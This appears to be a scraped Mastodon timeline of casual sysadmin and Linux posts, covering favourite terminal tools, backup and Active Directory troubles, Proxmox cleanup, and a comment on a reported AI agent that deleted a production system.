                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                My Current Favorites:

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                To get the ball rolling, here are a few tools I’ve been leaning on lately:

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • uv — Fast, reliable Python package and project management.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • fzf & ripgrep — The classic duo for fuzzy finding and searching.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • tmux — For session management and persistent terminal workspaces.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • jq / yq — Essential for wrangling JSON and YAML without leaving the prompt.

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                What about you?

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1. What is one tool you've discovered recently that you can't live without?
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2. Are there any TUI-based clients for web services (like Mastodon, GitHub, or RSS) that you recommend?
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3. Do you have a favorite "hidden gem" script or small utility?

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Mentions & Groups

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                @programming
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                @linux @terminal_u_i@lemmy.ml @selfhosted

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Hashtags

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  [?]Michael W Lucas :flan_on_fire: » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  @mwl@io.mwl.io

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  RE: glammr.us/@platypus/1164776655

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  I hate to say I told you so -- no.

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  wait.

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Truth is, I LOVE to say "I told you so," but I'm so damn tired of it.

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  A glorious example of why you shouldn't trust AI.

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  [?]Ruth [☕️ 👩🏻‍💻📚✍🏻🧵🪡🍵] » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  @platypus@glammr.us

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Reading this whole "My AI agent deleted prod and it's everybody's fault but mine" post -- it's on X but public and worth reading for knowing this incident. x.com/lifeof_jer/status/204810

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  (it's also a longform post vs. a thread, so easy to read)

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    AodeRelay boosted

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    [?]Michael W Lucas :flan_on_fire: » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    @mwl@io.mwl.io

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    looks like my old Intel Mac Air that I bought only for Vellum is about to become my main laptop. Which raises the most vital question when deploying a new laptop: sticker selection and placement.

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    mac air with an assortment of stickers, including various flan emojis, a racoon with a knife saying STAY SAFE STAB HARD, bsd.network, RUN BSD, and a hackers.town puffy. Plus the obligatory THIS MACHINE HACKS FASCISTS.

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Alt...mac air with an assortment of stickers, including various flan emojis, a racoon with a knife saying STAY SAFE STAB HARD, bsd.network, RUN BSD, and a hackers.town puffy. Plus the obligatory THIS MACHINE HACKS FASCISTS.

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      AodeRelay boosted

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      [?]matthew - retroedge.tech » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      @matthew@social.retroedge.tech

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      AodeRelay boosted

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      [?]BlablaLinux » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      @blablalinux@mastodon.blablalinux.be

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Opération vide-greniers sur Proxmox ! 🧹
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      On fait de la place pour de nouveaux projets. Adieu les VMs qui dorment, on ne garde que le meilleur ! 💪

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        AodeRelay boosted

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        [?]^. .^ Paul Wilde » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        @paul@notnull.space

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3rd Party Provider for a mutual client got in touch regarding setting up a feature in a system they support

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Them: "We can't get this configured, could you take a look?"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Me: takes look, gets same error, reads the documentation of the software product, finds out why, enable required settings "I was getting the same error, but then I read the documentation and we need to set these options..."
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Them: "Oh, that's a nice find!"

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        It's effectively their documentation! They are the support provider for the product! IT WAS NOT A NICE FIND, IT WAS WRITTEN RIGHT THERE IN SIMPLE WORDS

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        #SysAdmin #RTFM

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          [?]Linux Professional Institute » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          @LPI@fosstodon.org

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Happy ! 🐧🌎

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Did you know , the mascot penguin, was designed by programmer Larry Ewing in 1996 as a submission to a contest to create the Linux logo? Although his entry did not win, the artwork was adopted by the Linux community as the iconic brand character. The name “Tux” comes from “Torvalds’ UniX” and refers to the black-and-white tuxedo appearance of penguins.

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Happy World Penguin Day!

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Alt...Happy World Penguin Day!

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            [?]🍱 Sean ☕ » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            @GigaByte4711@whitespashe.uk

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Today's tech screw up:

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            I botched an upgrade on Zentyal, our Active Directory alternative. So, being a good sysadmin, I triggered a restore from our Veeam platform, which dutifully shut down the broken VM and began the restore operations.

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Using a service account that's stored in active directory. The restore failed, and now I'm reconfiguring my backup software to use locally stored service credentials.

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            You live and learn!

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              [?]🍱 Sean ☕ » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              @GigaByte4711@whitespashe.uk

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Does anyone have any suggestions for running an Active Directory replacement inside Linux?

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              I've been using Zentyal for a few years, and I'm just a little sick of using it now.

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                AodeRelay boosted

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                [?]BlablaLinux » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                @blablalinux@mastodon.blablalinux.be

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Quand l'interface décide de faire grève... 😅 J'ai repéré un petit souci de chargement des contrôleurs JavaScript sur la dernière version de Password Pusher. L'issue est postée, plus qu'à attendre le fix des dev ! 🚀

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  0 ★ 3 ↺

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  [?]oldsysops » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  @oldsysops@social.dk-libre.fr

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  allez vu que ca ne parle pas assez ici (troll).
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  j'ai une question pour les et les qui trainent sur le fediverse :
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Est ce que l' a integré votre travail/quotidien/projets ?qu'est ce que ca a changé pour vous (professionnellement).

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Personnellement je n'ai pas cherché d'usage (j'ai essayé de lui faire écrire une PSSI un soir de désespoir... ca n'a pas été concluant)


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2 ★ 0 ↺

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    [?]oldsysops » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    @oldsysops@social.dk-libre.fr

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    storagebox : commandé, installé, paramétré....
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    je réfléchi encore à la solution technique pour le backup, mais je pense que je vais partir sur un double backup :
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    en local, en distant...
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    je crois que je vais allez contre la faq et faire quand même un rsync du borg local (en plus.…)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    déjà que je suis un peu foufou et que je suis parti avec borg2 au lieu de borg stable...


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4 ★ 1 ↺

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      [?]oldsysops » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      @oldsysops@social.dk-libre.fr

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      aujourd'hui j'ai mis a jour la doc sur un alerteur, et comme je manquait d'inspiration j'ai mis ca, en esperant faire rire un ou deux collègues :

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Faire ce que dit l'alerte
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Réfléchir a pourquoi on a cette alerte alors qu'avant tout allait bien
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Se rendre compte qu'on ne comprend rien à l'informatique
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Se rouler en boule sur le sol et reflechir a ses choix de vie et comment on en est arrivé là.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Se reconvertir dans l'élevage de chèvres dans le larzac
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • avant de partir faire un ticket dans Redmine pour le prochain sysadmin/DBA.

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        oldsysops boosted

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        [?]Michael W Lucas :flan_on_fire: » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        @mwl@io.mwl.io

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Ah, Debian. Add a disk and you yet again renumber your network interfaces. :flan_molotov: :flan_cleaver: :flan_executioner: :flan_reaper: